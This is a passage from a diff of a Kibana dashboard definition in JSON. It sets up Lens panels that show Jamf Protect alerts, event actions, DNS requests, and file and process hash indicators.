"(observer.product : \"Jamf 
Protect\" and event.module : \"Alerts\" and event.severity : 3) or (observer.product :\"Jamf Protect\" and event.module :\"Threat Events Stream\" and event.severity \u003e= 8)" + }, + "visualization": { + "accessor": "5760cc55-e167-4ca1-882c-27413cb07e5e", + "colorMode": "Background", + "layerId": "bbbfa9bf-6f8a-4a2a-bae1-04e7b8b5649b", + "layerType": "data", + "palette": { + "name": "custom", + "params": { + "colorStops": [ + { + "color": "#E7664C", + "stop": null + } + ], + "continuity": "all", + "maxSteps": 5, + "name": "custom", + "progression": "fixed", + "rangeMax": null, + "rangeMin": null, + "rangeType": "number", + "reverse": false, + "steps": 3, + "stops": [ + { + "color": "#E7664C", + "stop": 28 + } + ] + }, + "type": "palette" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "a5ced168-f931-484a-bf34-898dee052142", + "w": 16, + "x": 32, + "y": 5 + }, + "panelIndex": "a5ced168-f931-484a-bf34-898dee052142", + "title": "High", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-56e39079-aa13-438a-8f1e-39d3d1207797", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "56e39079-aa13-438a-8f1e-39d3d1207797": { + "columnOrder": [ + "39191bf7-977f-4f41-bdf4-58d2ef9ae23a", + "ecd6f817-327d-4598-8c3a-5177c5916f7d", + "d5d9ae8b-8cf2-46dc-9f3e-0433a7097ad9", + "69fab47a-bf55-434a-93a8-755f9431e010", + "67bdcdac-9fa9-41c7-8070-3c82ae0e88a2", + "f11f1a0a-2fab-4220-9cab-08dd6518b5fa", + "eb44692c-2d2e-4f61-8883-3d24d57bdc16", + "92d876fd-cc9e-4914-a68c-f6dcbe26a803" + ], + "columns": { + "39191bf7-977f-4f41-bdf4-58d2ef9ae23a": { + "dataType": "string", + "isBucketed": true, + "label": "Filters", + 
"operationType": "filters", + "params": { + "filters": [ + { + "input": { + "language": "kuery", + "query": "\"event.module\" : \"Alerts\" or event.module : \"Threat Events Stream\" " + }, + "label": "" + } + ] + }, + "scale": "ordinal" + }, + "67bdcdac-9fa9-41c7-8070-3c82ae0e88a2": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "event id", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": true, + "orderBy": { + "columnId": "92d876fd-cc9e-4914-a68c-f6dcbe26a803", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "event.id" + }, + "69fab47a-bf55-434a-93a8-755f9431e010": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "hostname", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": true, + "orderBy": { + "columnId": "92d876fd-cc9e-4914-a68c-f6dcbe26a803", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "host.hostname" + }, + "92d876fd-cc9e-4914-a68c-f6dcbe26a803": { + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "d5d9ae8b-8cf2-46dc-9f3e-0433a7097ad9": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Detection", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": true, + "orderBy": { + "columnId": 
"92d876fd-cc9e-4914-a68c-f6dcbe26a803", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "event.reason" + ], + "size": 20 + }, + "scale": "ordinal", + "sourceField": "event.action" + }, + "eb44692c-2d2e-4f61-8883-3d24d57bdc16": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Product module", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "92d876fd-cc9e-4914-a68c-f6dcbe26a803", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 50 + }, + "scale": "ordinal", + "sourceField": "event.module" + }, + "ecd6f817-327d-4598-8c3a-5177c5916f7d": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Event start", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "ms" + }, + "scale": "interval", + "sourceField": "event.start" + }, + "f11f1a0a-2fab-4220-9cab-08dd6518b5fa": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Event outcome", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": true, + "orderBy": { + "columnId": "92d876fd-cc9e-4914-a68c-f6dcbe26a803", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "event.outcome" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + 
"visualization": { + "columns": [ + { + "columnId": "d5d9ae8b-8cf2-46dc-9f3e-0433a7097ad9", + "isTransposed": false, + "oneClickFilter": true, + "width": 444.875 + }, + { + "columnId": "ecd6f817-327d-4598-8c3a-5177c5916f7d", + "isTransposed": false, + "width": 239.8125 + }, + { + "columnId": "69fab47a-bf55-434a-93a8-755f9431e010", + "isTransposed": false, + "oneClickFilter": true + }, + { + "columnId": "92d876fd-cc9e-4914-a68c-f6dcbe26a803", + "hidden": true, + "isTransposed": false + }, + { + "columnId": "67bdcdac-9fa9-41c7-8070-3c82ae0e88a2", + "isTransposed": false + }, + { + "columnId": "f11f1a0a-2fab-4220-9cab-08dd6518b5fa", + "isTransposed": false + }, + { + "columnId": "39191bf7-977f-4f41-bdf4-58d2ef9ae23a", + "hidden": true, + "isTransposed": false + }, + { + "columnId": "eb44692c-2d2e-4f61-8883-3d24d57bdc16", + "isTransposed": false + } + ], + "layerId": "56e39079-aa13-438a-8f1e-39d3d1207797", + "layerType": "data", + "sorting": { + "columnId": "ecd6f817-327d-4598-8c3a-5177c5916f7d", + "direction": "desc" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 13, + "i": "35f2db30-0cb1-4d9d-9afe-dce4d8a973c9", + "w": 48, + "x": 0, + "y": 13 + }, + "panelIndex": "35f2db30-0cb1-4d9d-9afe-dce4d8a973c9", + "title": "Most recent alerts", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-fecd3402-4076-4ff6-8a63-e975ad495ec6", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "fecd3402-4076-4ff6-8a63-e975ad495ec6": { + "columnOrder": [ + "8ec54088-1a34-4a07-a111-aefc56377442", + "00a2b1c5-6e79-45d9-9882-b9bf43d3869e", + "d4c8e0fc-dc51-4088-a5d4-0d183753cb5d", + "f6ebb30a-6a01-4e31-a14b-1db70cb5694f" + ], + "columns": { + 
"00a2b1c5-6e79-45d9-9882-b9bf43d3869e": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Detection", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "f6ebb30a-6a01-4e31-a14b-1db70cb5694f", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "event.action" + }, + "8ec54088-1a34-4a07-a111-aefc56377442": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Process name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "f6ebb30a-6a01-4e31-a14b-1db70cb5694f", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "process.name" + }, + "d4c8e0fc-dc51-4088-a5d4-0d183753cb5d": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Hostname", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "f6ebb30a-6a01-4e31-a14b-1db70cb5694f", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "host.hostname" + }, + "f6ebb30a-6a01-4e31-a14b-1db70cb5694f": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } 
+ }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "8ec54088-1a34-4a07-a111-aefc56377442" + }, + { + "columnId": "f6ebb30a-6a01-4e31-a14b-1db70cb5694f" + }, + { + "columnId": "d4c8e0fc-dc51-4088-a5d4-0d183753cb5d", + "isTransposed": false + }, + { + "columnId": "00a2b1c5-6e79-45d9-9882-b9bf43d3869e", + "isTransposed": false + } + ], + "layerId": "fecd3402-4076-4ff6-8a63-e975ad495ec6", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "2fe17682-0e60-4338-a47a-971521a5e034", + "w": 24, + "x": 0, + "y": 26 + }, + "panelIndex": "2fe17682-0e60-4338-a47a-971521a5e034", + "title": "Top processes related to detection and hostname", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-2c906641-fc29-4d9a-829e-c62e84234311", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2c906641-fc29-4d9a-829e-c62e84234311": { + "columnOrder": [ + "6637434f-b2a7-4ce0-b6c5-e9e93710eaac", + "a850ab61-82cf-4307-8ee9-98aadce5c6d5" + ], + "columns": { + "6637434f-b2a7-4ce0-b6c5-e9e93710eaac": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of event.action", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "a850ab61-82cf-4307-8ee9-98aadce5c6d5", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": 
"event.action" + }, + "a850ab61-82cf-4307-8ee9-98aadce5c6d5": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "2c906641-fc29-4d9a-829e-c62e84234311", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + "a850ab61-82cf-4307-8ee9-98aadce5c6d5" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "6637434f-b2a7-4ce0-b6c5-e9e93710eaac" + ] + } + ], + "shape": "donut" + } + }, + "title": "Jamf Protect - event.action", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "c21c7eaa-0dd6-4360-990c-8ef0dc734f2e", + "w": 24, + "x": 24, + "y": 26 + }, + "panelIndex": "c21c7eaa-0dd6-4360-990c-8ef0dc734f2e", + "title": "Event actions", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-9e7e8b50-1080-47d3-8575-2564576e134a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "9e7e8b50-1080-47d3-8575-2564576e134a": { + "columnOrder": [ + "d4033bf2-aecc-4d71-b065-f88b9fa3d5d5", + "f56bf86e-3e15-4657-8f5c-a828df0aa7a8" + ], + "columns": { + "d4033bf2-aecc-4d71-b065-f88b9fa3d5d5": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Domain name", + "operationType": "terms", + "params": { + "exclude": [], + 
"excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "f56bf86e-3e15-4657-8f5c-a828df0aa7a8", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "dns.question.name" + }, + "f56bf86e-3e15-4657-8f5c-a828df0aa7a8": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "d4033bf2-aecc-4d71-b065-f88b9fa3d5d5" + }, + { + "columnId": "f56bf86e-3e15-4657-8f5c-a828df0aa7a8" + } + ], + "layerId": "9e7e8b50-1080-47d3-8575-2564576e134a", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "c667337a-237f-4002-9f74-4d914712fde5", + "w": 24, + "x": 0, + "y": 41 + }, + "panelIndex": "c667337a-237f-4002-9f74-4d914712fde5", + "title": "Top requested DNS requests", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-7927b71e-c9eb-4afe-baa5-f19e68ca53e2", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "7927b71e-c9eb-4afe-baa5-f19e68ca53e2": { + "columnOrder": [ + "0daf852c-dfa5-4434-ab43-132bf0845a48", + "ab9c6f3d-8c01-4bce-8d34-918c5cabc370", + "597a615a-9b9e-42d7-9cc1-2f365dcec00c" + ], + 
"columns": { + "0daf852c-dfa5-4434-ab43-132bf0845a48": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of event.action", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "597a615a-9b9e-42d7-9cc1-2f365dcec00c", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "event.action" + }, + "597a615a-9b9e-42d7-9cc1-2f365dcec00c": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "ab9c6f3d-8c01-4bce-8d34-918c5cabc370": { + "dataType": "string", + "isBucketed": true, + "label": "Top 3 values of event.reason", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "597a615a-9b9e-42d7-9cc1-2f365dcec00c", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "event.reason" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "observer.product : \"Jamf Protect\" and event.kind : \"alert\"" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + 
"597a615a-9b9e-42d7-9cc1-2f365dcec00c" + ], + "layerId": "7927b71e-c9eb-4afe-baa5-f19e68ca53e2", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "ab9c6f3d-8c01-4bce-8d34-918c5cabc370", + "xAccessor": "0daf852c-dfa5-4434-ab43-132bf0845a48" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "d73b82e9-36bf-4d4b-a8e5-97f2dfa66d08", + "w": 24, + "x": 24, + "y": 41 + }, + "panelIndex": "d73b82e9-36bf-4d4b-a8e5-97f2dfa66d08", + "title": "Top event actions", + "type": "lens" + }, + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "### Related File and Process IOCs", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 3, + "i": "d13c506e-7389-4132-abdf-f7e0edaf6e09", + "w": 48, + "x": 0, + "y": 56 + }, + "panelIndex": "d13c506e-7389-4132-abdf-f7e0edaf6e09", + "type": "visualization" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-26090b76-c5f9-4191-bfef-7ff1d4482507", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "26090b76-c5f9-4191-bfef-7ff1d4482507": { + "columnOrder": [ + "dcafb40b-e7ea-45e8-8056-40375483b59a", + "d5a12d26-617f-423c-8211-ec164c9d9398", + "bc0f902d-1443-4699-930e-2eb1702aeb97" + ], + 
"columns": { + "bc0f902d-1443-4699-930e-2eb1702aeb97": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "d5a12d26-617f-423c-8211-ec164c9d9398": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "file path", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bc0f902d-1443-4699-930e-2eb1702aeb97", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 50 + }, + "scale": "ordinal", + "sourceField": "file.path" + }, + "dcafb40b-e7ea-45e8-8056-40375483b59a": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "sha1hex", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bc0f902d-1443-4699-930e-2eb1702aeb97", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 50 + }, + "scale": "ordinal", + "sourceField": "file.hash.sha1" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "1392e022-2f27-496c-9eb7-a0afac25bead", + "key": "file.hash.sha1", + "negate": true, + "params": { + "query": "" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "file.hash.sha1": "" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": 
"dcafb40b-e7ea-45e8-8056-40375483b59a", + "isTransposed": false, + "oneClickFilter": true, + "width": 480 + }, + { + "columnId": "bc0f902d-1443-4699-930e-2eb1702aeb97", + "isTransposed": false, + "width": 156 + }, + { + "columnId": "d5a12d26-617f-423c-8211-ec164c9d9398", + "isTransposed": false + } + ], + "headerRowHeight": "auto", + "layerId": "26090b76-c5f9-4191-bfef-7ff1d4482507", + "layerType": "data", + "paging": { + "enabled": false, + "size": 10 + }, + "rowHeight": "auto" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": { + "dynamicActions": { + "events": [ + { + "action": { + "config": { + "openInNewTab": true + }, + "factoryId": "OPEN_IN_DISCOVER_DRILLDOWN", + "name": "Open in Discover" + }, + "eventId": "223dd31f-3469-4047-bb0b-f8ab8d530455", + "triggers": [ + "FILTER_TRIGGER" + ] + }, + { + "action": { + "config": { + "openInNewTab": true + }, + "factoryId": "OPEN_IN_DISCOVER_DRILLDOWN", + "name": "Research file path" + }, + "eventId": "60555379-bf66-4ae1-ad2c-8f96a18c47d3", + "triggers": [ + "FILTER_TRIGGER" + ] + } + ] + } + }, + "hidePanelTitles": false + }, + "gridData": { + "h": 23, + "i": "273e31c4-09aa-4378-a9e2-280c302ac86c", + "w": 19, + "x": 0, + "y": 59 + }, + "panelIndex": "273e31c4-09aa-4378-a9e2-280c302ac86c", + "title": "Top 10 file sha1hex values seen", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-26090b76-c5f9-4191-bfef-7ff1d4482507", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "26090b76-c5f9-4191-bfef-7ff1d4482507": { + "columnOrder": [ + "dcafb40b-e7ea-45e8-8056-40375483b59a", + "a7c13fe0-767c-4388-b1e4-ad6603f5a592", + "3ebc6d32-08de-4da7-ac1f-436f9cdaa138", + "bc0f902d-1443-4699-930e-2eb1702aeb97" + ], + "columns": { + 
"3ebc6d32-08de-4da7-ac1f-436f9cdaa138": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Process Executable", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bc0f902d-1443-4699-930e-2eb1702aeb97", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 3 + }, + "scale": "ordinal", + "sourceField": "process.executable" + }, + "a7c13fe0-767c-4388-b1e4-ad6603f5a592": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "sha1hex", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bc0f902d-1443-4699-930e-2eb1702aeb97", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "process.hash.sha1" + }, + "bc0f902d-1443-4699-930e-2eb1702aeb97": { + "dataType": "number", + "isBucketed": false, + "label": "Count of process.hash.sha256", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "process.hash.sha256" + }, + "dcafb40b-e7ea-45e8-8056-40375483b59a": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "sha256hex", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bc0f902d-1443-4699-930e-2eb1702aeb97", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "process.hash.sha256" 
+ } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "observer.product : \"Jamf Protect\" and event.module : \"Alerts\" " + }, + "visualization": { + "columns": [ + { + "columnId": "dcafb40b-e7ea-45e8-8056-40375483b59a", + "isTransposed": false, + "width": 896 + }, + { + "columnId": "bc0f902d-1443-4699-930e-2eb1702aeb97", + "isTransposed": false, + "width": 156 + }, + { + "columnId": "3ebc6d32-08de-4da7-ac1f-436f9cdaa138", + "isTransposed": false + }, + { + "columnId": "a7c13fe0-767c-4388-b1e4-ad6603f5a592", + "isTransposed": false + } + ], + "headerRowHeight": "auto", + "layerId": "26090b76-c5f9-4191-bfef-7ff1d4482507", + "layerType": "data", + "rowHeight": "auto" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 23, + "i": "ecb673d5-334d-4705-ac46-1f4878937090", + "w": 29, + "x": 19, + "y": 59 + }, + "panelIndex": "ecb673d5-334d-4705-ac46-1f4878937090", + "title": "Top 10 process shahex values by process executable", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-26090b76-c5f9-4191-bfef-7ff1d4482507", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "26090b76-c5f9-4191-bfef-7ff1d4482507": { + "columnOrder": [ + "a7c13fe0-767c-4388-b1e4-ad6603f5a592", + "dcafb40b-e7ea-45e8-8056-40375483b59a", + "3ebc6d32-08de-4da7-ac1f-436f9cdaa138", + "bc0f902d-1443-4699-930e-2eb1702aeb97" + ], + "columns": { + "3ebc6d32-08de-4da7-ac1f-436f9cdaa138": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Process Executable", + 
"operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bc0f902d-1443-4699-930e-2eb1702aeb97", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 50 + }, + "scale": "ordinal", + "sourceField": "process.executable" + }, + "a7c13fe0-767c-4388-b1e4-ad6603f5a592": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Process SigningID", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bc0f902d-1443-4699-930e-2eb1702aeb97", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 50 + }, + "scale": "ordinal", + "sourceField": "process.code_signature.signing_id" + }, + "bc0f902d-1443-4699-930e-2eb1702aeb97": { + "dataType": "number", + "isBucketed": false, + "label": "Count of process.code_signature.team_id", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "process.code_signature.team_id" + }, + "dcafb40b-e7ea-45e8-8056-40375483b59a": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Process SigningTeamID", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bc0f902d-1443-4699-930e-2eb1702aeb97", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 50 + }, + "scale": "ordinal", + "sourceField": "process.code_signature.team_id" + } + }, + "incompleteColumns": {}, + "sampling": 
